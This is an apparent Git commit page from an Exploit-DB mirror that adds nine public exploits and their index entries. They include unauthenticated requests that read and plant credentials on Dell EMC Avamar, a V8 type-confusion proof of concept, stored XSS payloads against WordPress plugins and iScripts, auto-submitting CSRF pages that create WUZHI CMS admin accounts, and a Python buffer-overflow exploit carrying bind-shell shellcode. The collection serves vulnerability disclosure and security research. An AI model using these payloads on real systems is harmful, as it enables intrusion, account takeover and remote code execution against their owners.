bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-04-11

Browse source 
9 changes to exploits/shellcodes

Google Chrome V8 JIT - 'LoadElimination::ReduceTransitionElementsKind' Type Confusion

DVD X Player Standard 5.5.3.9 - Buffer Overflow
iScripts Easycreate 3.2.1 - Stored Cross-Site Scripting
Wordpress Plugin Activity Log 2.4.0 - Stored Cross Site Scripting
WUZHI CMS 4.1.0 - ‘Add Admin Account’ Cross-Site Request Forgery
WUZHI CMS 4.1.0 - ‘Add User Account’ Cross-Site Request Forgery
Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control
WordPress File Upload Plugin 4.3.2 - Stored Cross Site Scripting
WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS
This commit is contained in:
Offensive Security 2018-04-11 05:01:46 +00:00
parent c91cad5a90
commit 08c1a4df45
10 changed files with 598 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

143
exploits/linux/webapps/44441.txt Normal file
View file

@ -0,0 +1,143 @@
# Exploit Title: [Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)]
# Date: [24/11/2017]
# Exploit Author: [SlidingWindow]
# Vendor Homepage: [https://store.Dell EMC.com/en-us/AVAMAR-PRODUCTS/Dell-DELL EMC-Avamar-Virtual-Edition-Data-Protection-Software/p/DELL EMC-Avamar-Virtual-Edition]
# Version: [Dell EMC Avamar Server 7.3.1 , Dell EMC Avamar Server 7.4.1, Dell EMC Avamar Server 7.5.0, Dell EMC Integrated Data Protection Appliance 2.0, Dell EMC Integrated Data Protection Appliance 2.1]
# Tested on: [Dell EMC Avamar Virtual Edition version 7.5.0.183]
# CVE : [CVE-2018-1217]
==================
#Product:-
==================
EMC Avamar Virtual Edition is great for enterprise backup data protection for small and medium sized offices. EMC Avamar Virtual Edition is optimized for backup and recovery of virtual and physical servers,enterprise applications,remote offices,and desktops or laptops.
==================
#Vulnerability:-
==================
Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)
========================
#Vulnerability Details:-
========================
=====================================================================================================================================================
1. Missing functional level access control allows an unauthenticated user to add DELL EMC Support Account to the Installation Manager (CVE-2018-1217)
=====================================================================================================================================================
DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could add an Online Support Account for DELL EMC without any user interaction.
#Proof-Of-Concept:
------------------
1. Send following request to the target:
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 8EGHBE4312AFBC12325324123DF4545A
X-GWT-Module-Base: https://<target_ip>/avi/avigui/
Referer: https://<target_ip>/avi/avigui.html
Content-Length: 452
Connection: close
7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611|<target_ip>|{"proxyHost":null, "proxyPort":0, "useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, "disableInternetAccess":false, "proxyEnable":false, "emcsupportUsername":"hacker", "emcsupportPassword":"hacked3", "disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7|
2. Log into Avamar Installation Manager and navigate to Configuration tab to make sure that the user 'hacker' was added successfully.
=========================================================================================================================================================
2. Missing functional level access control allows an unauthenticated user to retrieve DELL EMC Support Account Credentials in Plain Text (CVE-2018-1217)
=========================================================================================================================================================
DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could retrieve Online Support Account password in plain text.
#Proof-Of-Concept:
------------------
1. Send following request to the target:
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
DNT: 1
Content-Length: 192
7|0|6|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|<target_ip>|1|2|3|4|2|5|5|6|0|
2. Server returns credentials in plain text:
HTTP/1.1 200 OK
Date: Fri, 17 Nov 2017 10:46:31 GMT
Server: Jetty(9.0.6.v20130930)
Content-Type: application/json; charset=utf-8
Content-Disposition: attachment
Content-Length: 275
Connection: close
//OK[1,["{\"proxyHost\":null,\"proxyPort\":0,\"useProxyAuthentication\":false,\"proxyUsername\":\"\",\"proxyPassword\":\"\",\"disableInternetAccess\":false,\"proxyEnable\":false,\"emcsupportUsername\":\"hacker\",\"emcsupportPassword\":\"hacked3\",\"disableLDLS\":false}"],0,7]
=========================================================================================================================================================
3. Improper validation of ëDELL EMC Customer Support passcodeí allows an authenticated user to unlock DELL EMC Support Account and download verbose logs
=========================================================================================================================================================
DELL EMC Avamar fails to validate ëDELL EMC Customer Support passcodeí properly allowing an authenticated user to unlock the support account and view/download verbose logs. However, according to vendor, this one seems to be a vulnerability but it's an ambuious functionality instead.
#Proof-Of-Concept:
------------------
1. Try to unlock the support account with an invalid password and you get error 'Customer Support Access Denied':
2. Now send the same request again (with invalid password) and tamper the server response:
Request:
---------
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
X-GWT-Module-Base: https://<target_ip>/avi/avigui/
Referer: https://<target_ip>/avi/avigui.html
Content-Length: 202
Cookie: supo=x; JSESSIONID=9tt4unkdjjilbo072x4nji2y
Connection: close
7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611|<target_ip>|1|2|3|4|3|5|5|5|6|0|7|
Tampered response:
--------------------
HTTP/1.1 200 OK
Date: Fri, 24Nov 2017 07:57:25 GMT
Server: Jetty(9.0.6.v20130930)
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Disposition: attachment
Content-Length: 21
Connection: close
//OK[1,["true"],0,7]
3. This unlocks the support account and enabled the 'Log' download button.
===================================
#Vulnerability Disclosure Timeline:
===================================
11/2017: First email to disclose the vulnerability to EMC Security Response Team.
12/2017: Vendor confirmed vulnerability#1 and vulnerability#3, and discarded vulnerability#3 stating that this is an ambigious functionaliy and not a vulnerability.
12/2017: Vendor confirmed that the fix will be released in January 2018.
01/2018: Vendor delayed the fix release stating that the Dell EMC IDPA is also vulnerable.0
04/2018: Vendor assigned CVE-2018-1217 and pubished the advisory 'DSA-2018-025: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability': http://seclists.org/fulldisclosure/2018/Apr/14

73
exploits/multiple/dos/44442.js Normal file
View file

@ -0,0 +1,73 @@
/*
I think this commit has introduced the bug: https://chromium.googlesource.com/v8/v8.git/+/9884bc5dee488bf206655f07b8a487afef4ded9b
Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) {
...
if (object_maps.contains(ZoneHandleSet<Map>(source_map))) {
object_maps.remove(source_map, zone());
object_maps.insert(target_map, zone());
- AliasStateInfo alias_info(state, object, source_map);
- state = state->KillMaps(alias_info, zone());
- state = state->AddMaps(object, object_maps, zone());
+ state = state->SetMaps(object, object_maps, zone());
}
...
}
I think the "state->KillMaps(alias_info, zone());" was accidentally removed. This lack may lead CheckMap instructions to be removed incorrectly.
A PoC demonstrating type confusion:
*/
function opt(a, b) {
b[0] = 0;
a.length;
// TransitionElementsKind
for (let i = 0; i < 1; i++)
a[0] = 0;
// CheckMap removed, type confusion
b[0] = 9.431092e-317; // 0x1234567
}
let arr1 = new Array(1);
arr1[0] = 'a';
opt(arr1, [0]);
let arr2 = [0.1];
opt(arr2, arr2);
%OptimizeFunctionOnNextCall(opt);
opt(arr2, arr2);
arr2[0].x // access 0x1234566
Without natives syntax:
function opt(a, b) {
b[0] = 0;
a.length;
// TransitionElementsKind
for (let i = 0; i < 1; i++)
a[0] = 0;
b[0] = 9.431092e-317; // 0x1234567
// Force optimization
for (let i = 0; i < 10000000; i++) {
}
}
let arr1 = new Array(1);
arr1[0] = 'a';
opt(arr1, [0]);
let arr2 = [0.1];
opt(arr2, arr2);
opt(arr2, arr2);
arr2[0].x // access 0x1234566

31
exploits/php/webapps/44436.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: iScripts Easycreate 3.2.1 - Stored Cross-Site Scripting
# Date: 02/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iscripts.com
# Demo Page: https://www.demo.iscripts.com/easycreate/demo/
# Version: 3.2.1
# Tested on: Windows 10
# Category: Webapps
# CVE: CVE-2018-9236
# CVE: CVE-2018-9237
1. Description
====================
iScripts EasyCreate 3.2.1 has Stored Cross-Site Scripting in the "Site Description" and "Site Title" fields.
2. PoC
====================
1. from "user section", access to "dashboard" and select "Created from saved items" with edit option
2. In "edit site" action, Inject "><script>alert('2')</script> to "Site Description" field
3. Save and change!! refresh and we have alert pop up!
3. PoC
====================
1. from "user section", access to "dashboard" and select "Created from saved items" with edit option
2. In "edit site" action, Inject </title>"><script>alert('1')</script> to "Site title" field
3. Save and change! refresh and we have alert pop up!
4. References
====================
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9237
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9236

44
exploits/php/webapps/44437.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title : Activity Log Wordpress Plugin Stored Cross Site Scripting (XSS)
# Date: 25-02-2018
# Exploit Author : Stefan Broeder
# Vendor Homepage: https://pojo.me
# Software Link: https://wordpress.org/plugins/aryo-activity-log/
# Version: 2.4.0
# CVE : CVE-2018-8729
# Category : webapps
Description
===========
Activity Log is a WordPress plugin which tracks site activity. It has more than 70.000 active installations. Version 2.4.0 (and possibly the previous ones) are affected by several Stored XSS vulnerabilities.
Vulnerable part of code
=======================
Storing the payload:
File: aryo-activity-log/hooks/class-aal-hook-attachment.php:14. The log entry that is stored contains the result of get_the_title($post->ID), which can include HTML and is not sanitized by WordPress.
File: aryo-activity-log/hooks/class-aal-hook-comments.php:14. The log entry that is stored contains the result of get_the_title($comment->comment_post_ID), which can include HTML and is not sanitized by WordPress.
File: aryo-activity-log/hooks/class-aal-hook-posts.php:7. The log entry that is stored contains the result of $title = get_the_title($post), which can include HTML and is not sanitized by WordPress.
Displaying the payload:
File: aryo-activity-log/classes/class-aal-activity-log-list-table.php:209. $item->object_name is displayed without sanitization and can contain HTML tags.
Impact
======
Arbitrary JavaScript code can be run on browser side if a user is able to create a post or upload an attachment.
Exploitation
============
To successfully exploit this vulnerability, an attacker would have to perform any of the following:
- Create/edit/draft/publish/trash/untrash a post with JavaScript in the title
- Create/edit/trash/untrash/mark_as_spam/unmark_as_spam a comment on a post with JavaScript in the title
- Add/edit/delete an attachment with JavaScript in the attachment title
Regular website visitors will not have the capability to do any of these, however, possible threat actors might include:
- A user with the role of editor within WordPress (non-admins which are able to create content)
- A rogue administrator among multiple administrators
- A compromised plugin
If the payload has been injected, then it will be executed once the Activity Log is viewed. This can possibly lead to stealing of CSRF nonces and creation of new (administrator) users on the WordPress instance.
Solution
========
Update to 2.4.1

42
exploits/php/webapps/44439.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add admin account
# Date: 2018-04-10
# Exploit Author: taoge
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE : CVE-2018-9926
An issue was discovered in WUZHI CMS 4.1.0.https://github.com/wuzhicms/wuzhicms/issues/128
There is a CSRF vulnerability that can add an admin account via index.php?m=core&f=power&v=add.
After the administrator logged in, open the csrf exp page.
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='form[role][]' value='1' />";
fields += "<input type='hidden' name='form[username]' value='hack123' />";
fields += "<input type='hidden' name='form[password]' value='' />";
fields += "<input type='hidden' name='form[truename]' value='taoge@5ecurity' />";
var url = "http://127.0.0.1/www/index.php?m=core&f=power&v=add&&_su=wuzhicms&_menuid=61&_submenuid=62&submit=taoge";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

56
exploits/php/webapps/44440.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account
# Date: 2018-04-10
# Exploit Author: taoge
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE : CVE-2018-9927
An issue was discovered in WUZHI CMS 4.1.0.https://github.com/wuzhicms/wuzhicms/issues/128
There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.
After the administrator logged in, open the csrf exp page.
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />";
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />";
fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />";
fields += "<input type='hidden' name='info[mobile]' value='' />";
fields += "<input type='hidden' name='modelids[]' value='10' />";
fields += "<input type='hidden' name='info[groupid]' value='3' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='avatar' value='' />";
fields += "<input type='hidden' name='islock' value='0' />";
fields += "<input type='hidden' name='sys_name' value='0' />";
fields += "<input type='hidden' name='info[birthday]' value='' />";
fields += "<input type='hidden' name='info[truename]' value='' />";
fields += "<input type='hidden' name='info[sex]' value='0' />";
fields += "<input type='hidden' name='info[marriage]' value='0' />";
var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

33
exploits/php/webapps/44443.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: WordPress Plugin WordPress File Upload 4.3.2 - Stored XSS
# Date: 31/03/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iptanus.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip
# Version: 4.3.2
# Tested on: CentOS 6.5
# CVE : CVE-2018-9172
# Category : Webapps
1. Description
===========
WordPress File Upload is a WordPress plugin with more than 20.000 active
installations.
Version 4.3.2 (and possibly previous versions) are affected by a Stored XSS
vulnerability in the admin panel ,related to the "Uploader Instances"
functionality.
2. Proof of Concept
===========
1. Login to admin panel
2. Access to Wordpress File Upload Control Panel. In Uploader Instances
function, choose and edit created Instance
3. In Plugin ID field, inject XSS pattern such as:
<script>alert('ManhNho')</script> and click Update button
4. Access to Pages/Posts contain upload option, we got alert ManhNho
3. References
===========
https://www.iptanus.com/new-version-4-3-3-of-wordpress-file-upload-plugin/
https://wordpress.org/plugins/wp-file-upload/#developers
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9172

107
exploits/php/webapps/44444.txt Normal file
View file

@ -0,0 +1,107 @@
# Exploit Title: WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS
# Date: 06/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iptanus.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip
# Version: 4.3.3
# Tested on: Windows 7 / Cent OS 6.5
# CVE : CVE-2018-9844
# Category : Webapps
Description
===========
WordPress File Upload is a WordPress plugin with more than 20.000 active
installations.
Version 4.3.3 (and possibly previous versions) are affected by a Stored XSS
vulnerability in the admin panel ,related to the "Edit_Setting"
functionality.
PoC
===============
Request:
POST /wp-admin/options-general.php?page=wordpress_file_upload&action=edit_settings
HTTP/1.1
Host: 192.168.1.66
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101
Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.66/wp-admin/options-general.php?page=
wordpress_file_upload&action=plugin_settings
Content-Type: multipart/form-data; boundary=---------------------
------27678165033834
Content-Length: 906
Cookie: wordpress_ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7Ca3c7a75afaaf9ce1db3596b8aa83
3adeb337f313ef5156fbf93096c1af0cdbbc; wp-settings-1=libraryContent%3Dbrowse;
wp-settings-time-1=1522504284; PHPSESSID=o6smfv1u6p8rh7cu7v7gl9lm47;
wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_
ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7C1993c93121805782b8bee82cd013
6f1a6aa286d4294ed58cb6f95539acdfe5d5
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------27678165033834
Content-Disposition: form-data; name="_wpnonce"
c9d5733e36
-----------------------------27678165033834
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/options-general.php?page=wordpress_file_upload&
action=plugin_settings
-----------------------------27678165033834
Content-Disposition: form-data; name="action"
edit_settings
-----------------------------27678165033834
Content-Disposition: form-data; name="wfu_basedir"
<script>alert('XSS')</script>
-----------------------------27678165033834
Content-Disposition: form-data; name="wfu_postmethod"
fopen
-----------------------------27678165033834
Content-Disposition: form-data; name="wfu_admindomain"
siteurl
-----------------------------27678165033834
Content-Disposition: form-data; name="submitform"
Update
-----------------------------27678165033834--
Response:
HTTP/1.1 200 OK
Date: Thu, 05 Apr 2018 18:15:01 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28623
...
<input name="wfu_basedir" id="wfu_basedir" type="text"
value="<script>alert('XSS')</script>" />
<p style="cursor: text; font-size:9px; padding: 0px; margin: 0px; width:
95%; color: #AAAAAA;">Current value: <strong><script>alert('XSS')</
script></strong></p>
...
References
===============
https://www.iptanus.com/new-version-4-3-4-of-wordpress-file-upload-plugin/
https://wordpress.org/plugins/wp-file-upload/#developers
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9844

60
exploits/windows_x86/local/44438.txt Normal file
View file

@ -0,0 +1,60 @@
######################################################
# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
# Date: 29.03.2018
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-
# Standard.exe
# Category: Local (SEH Based)
# Exploit Credit: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 5.5.3.9
# Tested on: Windows XP SP3 x86
# CVE: CVE-2018-9128
######################################################
# root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "\x00\x0a\x0d\x1a" -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# x86/shikata_ga_nai chosen with final size 355
# Payload size: 355 bytes
# Final size of python file: 1710 bytes
file = open("exploit_dvdx_player_standard_5.5.3.9.plf","w")
buffer = "\x41" * 608
next_seh = "\xeb\x06\x90\x90"
seh = "\xBC\x13\x5F\x02" # pop/pop/ret : EchoDelayProcess.dll
nops = "\x90" * 100
buf = ""
buf += "\xda\xd4\xd9\x74\x24\xf4\xb8\xb3\xb9\xc8\xae\x5a\x31"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x13\x03\xf1\xaa\x2a"
buf += "\x5b\x09\x24\x28\xa4\xf1\xb5\x4d\x2c\x14\x84\x4d\x4a"
buf += "\x5d\xb7\x7d\x18\x33\x34\xf5\x4c\xa7\xcf\x7b\x59\xc8"
buf += "\x78\x31\xbf\xe7\x79\x6a\x83\x66\xfa\x71\xd0\x48\xc3"
buf += "\xb9\x25\x89\x04\xa7\xc4\xdb\xdd\xa3\x7b\xcb\x6a\xf9"
buf += "\x47\x60\x20\xef\xcf\x95\xf1\x0e\xe1\x08\x89\x48\x21"
buf += "\xab\x5e\xe1\x68\xb3\x83\xcc\x23\x48\x77\xba\xb5\x98"
buf += "\x49\x43\x19\xe5\x65\xb6\x63\x22\x41\x29\x16\x5a\xb1"
buf += "\xd4\x21\x99\xcb\x02\xa7\x39\x6b\xc0\x1f\xe5\x8d\x05"
buf += "\xf9\x6e\x81\xe2\x8d\x28\x86\xf5\x42\x43\xb2\x7e\x65"
buf += "\x83\x32\xc4\x42\x07\x1e\x9e\xeb\x1e\xfa\x71\x13\x40"
buf += "\xa5\x2e\xb1\x0b\x48\x3a\xc8\x56\x05\x8f\xe1\x68\xd5"
buf += "\x87\x72\x1b\xe7\x08\x29\xb3\x4b\xc0\xf7\x44\xab\xfb"
buf += "\x40\xda\x52\x04\xb1\xf3\x90\x50\xe1\x6b\x30\xd9\x6a"
buf += "\x6b\xbd\x0c\x06\x63\x18\xff\x35\x8e\xda\xaf\xf9\x20"
buf += "\xb3\xa5\xf5\x1f\xa3\xc5\xdf\x08\x4c\x38\xe0\x32\x5f"
buf += "\xb5\x06\x50\x4f\x90\x91\xcc\xad\xc7\x29\x6b\xcd\x2d"
buf += "\x02\x1b\x86\x27\x95\x24\x17\x62\xb1\xb2\x9c\x61\x05"
buf += "\xa3\xa2\xaf\x2d\xb4\x35\x25\xbc\xf7\xa4\x3a\x95\x6f"
buf += "\x44\xa8\x72\x6f\x03\xd1\x2c\x38\x44\x27\x25\xac\x78"
buf += "\x1e\x9f\xd2\x80\xc6\xd8\x56\x5f\x3b\xe6\x57\x12\x07"
buf += "\xcc\x47\xea\x88\x48\x33\xa2\xde\x06\xed\x04\x89\xe8"
buf += "\x47\xdf\x66\xa3\x0f\xa6\x44\x74\x49\xa7\x80\x02\xb5"
buf += "\x16\x7d\x53\xca\x97\xe9\x53\xb3\xc5\x89\x9c\x6e\x4e"
buf += "\xb7\x6d\xa2\x5b\x20\xd4\x57\x26\x2c\xe7\x82\x65\x49"
buf += "\x64\x26\x16\xae\x74\x43\x13\xea\x32\xb8\x69\x63\xd7"
buf += "\xbe\xde\x84\xf2"
file.write(buffer + next_seh + seh + nops + buf)
file.close()

9
files_exploits.csv
View file

@ -5925,6 +5925,7 @@ id,file,description,date,author,type,platform,port
44404,exploits/windows/dos/44404.html,"Microsoft Windows - Multiple Use-After-Free Issues in jscript Array Methods",2018-04-05,"Google Security Research",dos,windows,
44427,exploits/multiple/dos/44427.txt,"WebKit - WebAssembly Parsing Does not Correctly Check Section Order",2018-04-09,"Google Security Research",dos,multiple,
44428,exploits/linux/dos/44428.txt,"CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure",2018-04-09,"RedTeam Pentesting",dos,linux,
44442,exploits/multiple/dos/44442.js,"Google Chrome V8 JIT - 'LoadElimination::ReduceTransitionElementsKind' Type Confusion",2018-04-10,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9640,6 +9641,7 @@ id,file,description,date,author,type,platform,port
44422,exploits/java/local/44422.py,"H2 Database - 'Alias' Arbitrary Code Execution",2018-04-09,gambler,local,java,
44423,exploits/windows/local/44423.py,"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)",2018-04-09,bzyo,local,windows,
44426,exploits/linux/local/44426.py,"PMS 0.42 - Local Stack-Based Overflow (ROP)",2018-04-09,"Juan Sacco",local,linux,
44438,exploits/windows_x86/local/44438.txt,"DVD X Player Standard 5.5.3.9 - Buffer Overflow",2018-04-10,"Prasenjit Kanti Paul",local,windows_x86,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39132,3 +39134,10 @@ id,file,description,date,author,type,platform,port
44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,
44435,exploits/php/webapps/44435.txt,"WordPress Plugin Google Drive 2.2 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
44436,exploits/php/webapps/44436.txt,"iScripts Easycreate 3.2.1 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
44437,exploits/php/webapps/44437.txt,"Wordpress Plugin Activity Log 2.4.0 - Stored Cross Site Scripting",2018-04-10,"Stefan Broeder",webapps,php,
44439,exploits/php/webapps/44439.txt,"WUZHI CMS 4.1.0 - Add Admin Account Cross-Site Request Forgery",2018-04-10,taoge,webapps,php,
44440,exploits/php/webapps/44440.txt,"WUZHI CMS 4.1.0 - Add User Account Cross-Site Request Forgery",2018-04-10,taoge,webapps,php,
44441,exploits/linux/webapps/44441.txt,"Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control",2018-04-10,SlidingWindow,webapps,linux,
44443,exploits/php/webapps/44443.txt,"WordPress File Upload Plugin 4.3.2 - Stored Cross Site Scripting",2018-04-10,ManhNho,webapps,php,
44444,exploits/php/webapps/44444.txt,"WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS",2018-04-10,ManhNho,webapps,php,

Can't render this file because it is too large.